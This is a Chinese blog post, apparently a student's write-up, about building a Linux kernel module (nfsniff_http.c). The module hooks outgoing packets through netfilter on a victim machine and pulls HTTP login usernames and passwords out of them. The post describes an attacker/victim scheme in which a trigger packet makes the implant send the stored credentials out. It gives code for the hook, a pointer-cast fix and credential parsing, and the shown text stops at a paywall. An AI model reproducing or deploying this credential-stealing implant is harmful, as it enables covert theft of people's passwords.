Netfilter编程实现HTTP协议传输账号密码的抓取

最新推荐文章于 2024-01-26 15:03:14 发布
最新推荐文章于 2024-01-26 15:03:14 发布
阅读量4.2k 收藏 8
点赞数 5
分类专栏: 信息安全 linux内核 netfilter 文章标签: 信息安全 iptables linux内核 netfilter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bw_yyziq/article/details/78290715
版权
本文介绍了如何通过LKM编程结合iptables和netfilter,抓取HTTP协议中传输的账号密码。首先,文章概述了HTTP协议的安全隐患,并展示了在不同Linux内核版本和操作系统位数下的代码调整。接着,详细讲述了利用字符串匹配从HTTP请求报文中提取账号密码的步骤,以及在实际操作中如何加载模块和执行攻击者与受害者的交互过程。
摘要由CSDN通过智能技术生成

本文简介

HTTP协议用于在Web浏览器和网站服务器之间传递信息,以明文方式发送内容,没有任何方式的数据加密,因此只要截获报文就可以很轻松的获取某些关键的信息,比如登录时的用户名和密码。最近学习到LKM编程以及iptables和netfilters编程,本文参考详细原理点击此处里面的nfsniff.c(ftp用户名密码的窃取代码),修改之后的nfsniff_http.c实现了对HTTP协议传输的账号密码的抓取。

大致步骤

假设此时有两台电脑,攻击者和受害者
1.将nfsniff_http.c编译到受害者内核,勾出向外发出的报文,一旦发现有账号密码则记录到内存
2.攻击者运行getpass,向受害者发送暗号
3.受害者接收到暗号报文,将记录的账号密码发送给攻击者

linux内核版本以及操作系统位数问题

参考代码nfsniff.c基于内核版本:2.x,32位系统
修改代码nfsniff_http.c基于Ubuntu 16.04,内核版本:4.10.0,64位系统
两份代码不同之处:
1.钩子函数定义改变

//2.x
unsigned int hook_func(unsigned int hooknum,
                                 struct sk_buff **skb,
                                 const struct net_device *in,
                                 const struct net_device *out,
                                 int (*okfn)(struct sk_buff *)){}
//4.10.0
static unsigned int watch_in(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){}

2.系统位数导致强制类型转换错误

//nfsniff.c
//此处tcp为指针类型,32位系统中大小为4个字节,因此可以强转为同样是4个字节的int类型
data = (char *)((int)tcp + (int)(tcp->doff * 4));
//nfsniff_http.c
//64位系统中指针类型8个字节,因此强转为int会出错,可以转成同样为8字节的long型
data = (char *)((unsigned long)tcp + (unsigned long)(tcp->doff * 4));

利用字符串匹配从http请求报文中抠出账号密码

这里仅抓取用户名和密码,若要匹配的话必须知道登录界面中提交的表单里面是如何定义这两个参数的,当然可以用wireshark抓包分析得到参数名称,这里我们也可以在不抓包的情况下从页面源码获得,首先从界面右键查看页面源码,发现参数定义如下图:
这里写图片描述
这里写图片描述
这样我们就可以用查看到的uid和password进行匹配得到我们想要的账号密码信息了,下面看字符串匹配的代码

//Connection是http的一个首部字段名
if (strstr(data,"Connection") != NULL && strstr(data, "uid") != NULL && strstr(data, "password") != NULL) { 

    /*cookie字段Connection之前,里面存放了以前输入过的信息,其中可能包括以前输入的账号密码,为了不让cookie字段影响我们的匹配,将账号密码的匹配工作从Connection以后开始,因为本次表单提交的数据在数据包所处的位置都在Connection字段之后*/
        check_connection = strstr(data,"Connection");
        /*代码里的这种printk是用来调试的时候用的,dmesg命令时可以发现代码进入了哪些地方或者在哪里出了问题*/
        printk("3333333333333333333333333333333333333333333333333333333333333333");

        //用前面查找到的uid匹配出用户名
        name = strstr(check_connection,"uid=");
        _and = strstr(name,"&");
        name += 4;
        len = _and - name;
        //申请内存,存入uid
        if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
          return;
        memset(username, 0x00, len + 2);
        for (i = 0; i < len; ++i)
        {
          *(username + i) = name[i];
        }
        *(username + len) = '\0';

    //用前面查找到的password匹配出密码
        passwd = strstr(name,"password=");
        _and = strstr(passwd,"&");
        passwd += 9;
        len = _and - passwd;
        if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
最低0.47元/天 解锁文章
bw_yyziq
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
利用netfilter机制,实现内核防火墙把http请求和回应的数据包截获后,解释出其中的http层数据
疯狂学linux
11-04 2641
#include #include #include #include #include #include #include #include #include unsigned int change(int aChar,int hex) {     int ch;     ch = aChar - hex;     return ch; } unsigned cha
使用HttpClient登陆网站 抓取页面数据
zhanglongpro
01-15 795
使用HttpClient开源工具包访问网络比HttpURLConnection省了不少事 步骤如下: 1.使用HttpPost提交表单数据,比如用户名密码什么的,HttpClient.getCookieStore().getCookies(),拿到到登陆Cookie 2.使用HttpGet获取要得到的页面,执行的时候带上得到的Cookie数据才能正确访问 我就抓取到了整个学校图书馆
Netfilter实战一数据包的捕获
haoyuxuanyuan的博客
03-07 1138
  通过上文Netfilter介绍的了解到,Netfilter是通过注册钩子函数来将我们的代码加入Netfilter的处理机制中,我们首先需要了解各个钩子点的含义,PRE_ROUTING、LOCAL_IN、FORWARD、LOCAL_OUT和POST_ROUTING是Netfilter钩子点。它们是在Linux内核网络协议栈中定义的五个特定点,用于处理网络数据包的不同阶段。以下是它们的详细介绍:   以上代码定义了一个hook_func函数,该函数将被注册到NF_INET_PRE_ROUTING钩子点,当有
netfilter分析1-钩子函数在内核的初始化
一个码农的足迹
07-20 1094
Linux内核中网络防火墙是通过NF_HOOK宏调用钩子函数进行报文处理,本文基于内核版本4.4对钩子函数的初始化流程进行描述。 以过滤本地报文的钩子函数为例。本地报文过滤钩子函数调用宏: NF_HOOK(NFPROTO_IPV4, NF_INET_LOCAL_IN, net, NULL, skb, skb->dev, NULL, ip_local_deliver_finish); 这个宏在文件/include/linux/netfilter.h中定义: sta...
Wireshark抓取明文(http协议)用户名和密码
国内一线红队,擅长攻防渗透,APT
02-03 1万+
有关wireshark的安装及功能简介请点击 如果你访问的网站的协议是http的,那么你的数据在网络中传输就是明文的,我们可以通过wireshark抓到这一数据。下面将演示用此工具抓取本地搭建的让http协议网站的登录用户名及密码 实验步骤 1.启动wireshark,勾选所在网络 2.双击进去之后,点击左上角红色的正方形先停止捕获 3.填写过滤器,过...
利用netfilter NFQUEUE实现网关认证的HTTP重定向
01-14
摘 要:利用netfilter的NFQUEUE机制,将未认证用户的TCP 80端口流量发送至用户态进程redir_http,redir_http使用原始套接字发送应答数据分组,在用户态实现HTTP重定向功能。这种实现方法既保证了重定向的高性能,又...
Linux Netfilter编程源码
12-16
实现linux下防火墙的应用,可以添加相应规则对网络数据包进行相应过滤。
netfilter-nf-conntrack-模块实现分析.doc编程资料
04-06
netfilter-nf-conntrack-模块实现分析.doc
基于Netfilter框架的防火墙设计与实现
最新发布
05-17
【作品名称】:基于Netfilter框架的防火墙设计与实现 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:这是一外个网络...
网站抓取小工具
01-30
网站抓取小工具,如机器没有.netframework,需自行下载安装.netframework
Netfilter源代码分析详解.docx编程资料
04-06
- **HOOK机制的作用**:HOOK机制允许内核中的任何模块对每种协议的一个或多个HOOK点进行注册,从而实现挂接。当数据包到达某个HOOK点时,内核会检测是否已经有模块对该HOOK点进行了注册,如果有,则调用相应的回调...
http请求带用户名和密码验证
热门推荐
DK微风的博客
04-30 3万+
发送http请求往往需要带用户名和密码,服务端进行授权验证 实现方式是将将用户名和密码放到请求头里面,采用BasicAuthenticationScheme ,译为基本授权方案,想要了解的可以自己查查 下面是客户端和服务端的实现 客户端实现: public void httpSetAuth() throws IOException { String url3="ht...
文章标题 netfilter的hook函数
daocaoguizu的博客
09-08 928
一,hook点与数据流向 linux抽象出整体的hook架构,通过在以下几个数据流经点添加hook机制,为实现netfilter提供基础框架: NF_IP_PRE_ROUTING、NF_IP_LOCAL_IN、NF_IP_FORWARD、NF_IP_LOCAL_OUT、NF_IP_POST_ROUTING。 这五个点在数据的流经方向如下图: 二、数据结构 1、nf_hook_ops
iptables衍生出的疑问
qq_41781462的博客
04-19 386
学习Iptable和netfilter中有很多疑问,简单分析了netfilter的原理,以及如何自己注册自定义表和钩子函数
网络基础应用层--HTTP协议
baiduren__的博客
08-28 1916
而应用程序是程序员自己写的,应用程序之间如何沟通,用什么协议程序自己定义。自己定制的数据格式约定。传输性能+解析性能传输:按照指定格式组织好的二进制数据串要尽可能短小解析:将二进制数据串进行解析得到数据对象尽可能简单快速不成熟版本,只有GET进行超文本数据传输,协议格式不完善…....
Linux Netfilter框架实现及函数调用处理过程
mrtyxr的博客
01-26 1276
本身从事网络安全工作,具体为防火墙产品的开发,对Linux 内核而言,Linux 防火墙功能由Netfilter框架实现,因此有了对Linux内核Netfilter实现逻辑的学习研究的兴趣,也想借此平台和大家一起交流学习。
HTTP带用户名和密码请求
cmm_1103的博客
02-27 1万+
import java.io.IOException;import org.apache.commons.codec.binary.Base64;import com.cn.mid.system.urls.UrlUtils;import okhttp3.Authenticator;import okhttp3.Credentials;import okhttp3.OkHttpClient;impo...
Web后端语言模拟http请求(带用户名和密码)实例代码大全
weixin_33830216的博客
03-20 511
RESTful API是目前比较成熟的一套互联网应用程序的API设计理论。而随着RESTful API的成熟和流行,应用开发方面就需要以模拟http请求的方式来调用RESTful API接口;经过一段时间的IBM的云平台Blumemix的学习及语言翻译服务的应用,积累了Java、ASP.NET、Nodejs、Go、PHP、Python、Ruby等语言调用...
netfilter编程课程
12-22
Netfilter编程课程是针对Linux操作系统下的防火墙和数据包过滤器进行编程的课程。在这门课程中,学生将学习如何使用Netfilter框架来对数据包进行过滤、修改和重定向,以提高系统的安全性和性能。 在课程中,学生将学习如何编写可以在Linux内核中运行的模块,以便与Netfilter进行交互。他们将了解Netfilter框架的工作原理,掌握iptables和ebtables等工具的使用方法,以及如何使用Netfilter实现网络地址转换(NAT)和网络地址端口转换(NAPT)等功能。 除此之外,学生还将学习如何编写自定义的数据包过滤器,以允许或拒绝特定类型的数据包通过系统。通过学习Netfilter编程,学生可以深入理解Linux系统中网络数据包的处理流程,从而提高系统的网络安全性和性能。 在课程结束时,学生将能够独立编写Netfilter模块,实现自定义的数据包过滤和操作逻辑,以满足特定的网络安全需求。同时,他们也将能够更好地理解和应用Linux系统中的网络安全相关知识,为自己的职业发展奠定坚实的基础。 总的来说,Netfilter编程课程不仅可以帮助学生深入了解Linux系统中的网络安全机制,还可以为他们的职业发展和技术研究提供全面的指导和支持。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值